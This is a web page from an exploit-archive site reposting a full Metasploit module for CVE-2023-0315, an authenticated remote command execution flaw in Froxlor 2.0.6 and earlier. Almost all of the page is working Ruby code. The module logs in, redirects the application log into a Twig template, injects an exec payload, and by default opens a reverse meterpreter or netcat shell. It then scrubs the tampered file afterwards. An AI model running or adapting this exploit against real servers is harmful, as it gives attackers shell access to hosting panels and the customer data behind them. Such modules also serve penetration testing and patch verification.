Advertisement






Froxlor 2.0.6 Remote Command Execution

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023020040

Below is a copy:

Froxlor 2.0.6 Remote Command Execution
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Froxlor Log Path RCE',
        'Description' => %q{
          Froxlor v2.0.6 and below suffer from a bug that allows authenticated users to change the application logs path
          to any directory on the OS level which the user www-data can write without restrictions from the backend which
          leads to writing a malicious Twig template that the application will render. That will lead to achieving a
          remote command execution under the user www-data.
        },
        'Author' => [
          'Askar', # discovery
          'jheysel-r7' # module
        ],
        'References' => [
          [ 'URL', 'https://shells.systems/author/askar/'],
          [ 'CVE', '2023-0315']
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Privileged' => false,
        'Arch' => [ ARCH_CMD ],
        'Targets' => [
          [
            'Linux ',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'CmdStagerFlavor' => ['wget'],
              'Type' => :linux_dropper,
              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_memory,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        },
        'DisclosureDate' => '2023-01-29'
      )
    )

    register_options(
      [
        OptString.new('USERNAME', [true, 'A specific username to authenticate as', 'admin']),
        OptString.new('PASSWORD', [true, 'A specific password to authenticate with', '']),
        OptString.new('TARGETURI', [true, 'The base path to the vulnerable Froxlor instance', '/froxlor']),
        OptString.new('WEB_ROOT', [true, 'The webroot ', '/var/www/html'])
      ]
    )
  end

  def login
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/index.php'),
      'keep_cookies' => true,
      'vars_post' => {
        'loginname' => datastore['USERNAME'],
        'password' => datastore['PASSWORD'],
        'send' => 'send',
        'dologin' => ''
      }
    )

    if res && (res.code == 302 && res.headers.include?('Location') && res.headers['Location'] == 'admin_index.php')
      send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, '/admin_index.php'),
        'keep_cookies' => true
      )
      print_good('Successful login')
      true
    else
      false
    end
  end

  def check
    begin
      @authenticated = login
    rescue InvalidRequest, InvalidResponse => e
      return Exploit::CheckCode::Unknown("Failed to authenticate to Froxlor: #{e.class}, #{e}")
    end

    version_url = '/lib/ajax.php?action=updatecheck&theme=Froxlor'
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, version_url),
      'keep_cookies' => true
    )

    if res.nil? || res.code != 200
      Exploit::CheckCode::Unknown("Failed to retrieve version info from #{normalize_uri(target_uri.path, version_url)}")
    else
      version = res.get_html_document.at('body/span/text()')
      if version
        if Rex::Version.new('2.0.6') >= Rex::Version.new(version)
          Exploit::CheckCode::Appears("Vulnerable version found: #{version}")
        end
      else
        Exploit::CheckCode::Detected("Failed to obtain Froxlor version info from #{normalize_uri(target_uri.path, version_url)}")
      end
    end
  end

  def get_csrf_token(url)
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, url),
      'keep_cookies' => true
    )

    fail_with(Failure::UnexpectedReply, "Failed to get csrf token from #{normalize_uri(target_uri.path, url)}") unless (!res.nil? || res.code == 200)
    csrf_token = res.get_html_document.at('//input[@name="csrf_token"]/@value')&.text
    fail_with(Failure::UnexpectedReply, "No CSRF token found when querying #{normalize_uri(target_uri.path, url)}.") unless csrf_token
    print_good("CSRF token is : #{csrf_token}")
    csrf_token
  end

  def change_log_path(new_logfile)
    mime = Rex::MIME::Message.new
    mime.add_part('0', nil, nil, 'form-data; name="logger_enabled"')
    mime.add_part('1', nil, nil, 'form-data; name="logger_enabled"')
    mime.add_part('2', nil, nil, 'form-data; name="logger_severity"')
    mime.add_part('file', nil, nil, 'form-data; name="logger_logtypes[]"')
    mime.add_part(new_logfile, nil, nil, 'form-data; name="logger_logfile"')
    mime.add_part('0', nil, nil, 'form-data; name="logger_log_cron"')
    mime.add_part(@csrf_token, nil, nil, 'form-data; name="csrf_token"')
    mime.add_part('overview', nil, nil, 'form-data; name="page"')
    mime.add_part('', nil, nil, 'form-data; name="action"')
    mime.add_part('send', nil, nil, 'form-data; name="send"')

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/admin_settings.php?'),
      'vars_get' => { 'page' => 'overview', 'part' => 'logging' },
      'keep_cookies' => true,
      'ctype' => "multipart/form-data; boundary=#{mime.bound}",
      'data' => mime.to_s
    )

    if res && res.code == 200 && res.body.include?('The settings have been successfully saved')
      return true
    end

    false
  end

  def execute_command(cmd, _opts = {})
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/admin_index.php'),
      'keep_cookies' => true,
      'vars_post' => {
        'theme' => "{{['#{cmd}']|filter('exec')}}",
        'csrf_token' => @csrf_token,
        'page' => 'change_theme',
        'send' => 'send',
        'dosave' => ''
      }
    )

    if res && res.code == 302 && res.headers['Location']
      if res.headers['Location'] == 'admin_index.php'
        print_good('Injected payload successfully')
        print_status("Changing log path back to default value while triggering payload: #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/logs/froxlor.log")
        change_log_path("#{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/logs/froxlor.log")
      end
    else
      print_error('did not inject payload successfully')
    end
  end

  def exploit
    fail_with(Failure::NoAccess, 'Failed to login') unless @authenticated || login
    @csrf_token = get_csrf_token('/admin_settings.php?page=overview&part=logging')

    if change_log_path("#{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")
      print_good("Changed logfile path to: #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")
      case target['Type']
      when :unix_memory
        execute_command(payload.encoded)
      when :linux_dropper
        execute_cmdstager
      else
        print_error('Please enter valid target')
      end
    else
      fail_with(Failure::UnexpectedReply, 'Failed to change the log path. The target might not be exploitable')
    end
  end

  def on_new_session(session)
    super
    # Original footer.html.twig file
    footer_html_twig = <<~EOF
      <footer class="text-center mb-3">
              <span>
                      <img src="{{ basehref|default("") }}templates/Froxlor/assets/img/logo_grey.png" alt="Froxlor"/>
                      {% if install_mode is not defined  %}
                              {% if (get_setting('admin.show_version_login') == '1'
                                      and area == 'login') or (area != 'login'
                                      and get_setting('admin.show_version_footer') == '1') %}
                                      {{ call_static('\\Froxlor\\Froxlor', 'getFullVersion') }}
                              {% endif %}
                      {% endif %}
                      &copy; 2009-{{ "now"|date("Y") }} by <a href="https://www.froxlor.org/" rel="external" target="_blank">the Froxlor Team</a><br>
                      {% if install_mode is not defined %}
                              {% if (get_setting('panel.imprint_url') != '') %}<a href="{{ get_setting('panel.imprint_url') }}" target="_blank" class="footer-link">{{ lng('imprint') }}</a>{% endif %}
                              {% if (get_setting('panel.terms_url') != '') %}<a href="{{ get_setting('panel.terms_url') }}" target="_blank" class="footer-link">{{ lng('terms') }}</a>{% endif %}
                              {% if (get_setting('panel.privacy_url') != '') %}<a href="{{ get_setting('panel.privacy_url') }}" target="_blank" class="footer-link">{{ lng('privacy') }}</a>{% endif %}
                      {% endif %}
              </span>

          {% if lng('translator') %}
                      <br/>
              <small class="mt-3">{{ lng('panel.translator') }}: {{ lng('translator') }}</small>
          {% endif %}
      </footer>
    EOF
    if session.type == 'meterpreter'
      print_status('Deleting tampered footer.html.twig file')
      filename = "#{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig"
      session.fs.file.rm(filename)
      fd = session.fs.file.new(filename, 'wb')
      print_status('Rewriting clean footer.html.twig file')
      fd.write(footer_html_twig)
      fd.close
    else
      print_status('Cleaning tampered footer.html.twig file')
      # Remove all log lines added to footer.html.twig by the exploit
      # (all log lines start with an opening square bracket ex: [2023-02-16 09:08:28] froxlor.INFO: [API] ...)
      session.shell_command_token("sed '/^\\[/d' #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig > #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/tmp")
      session.shell_command_token("mv -f #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/tmp #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")
      session.shell_command_token("rm #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/tmp")
    end
  end
end

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.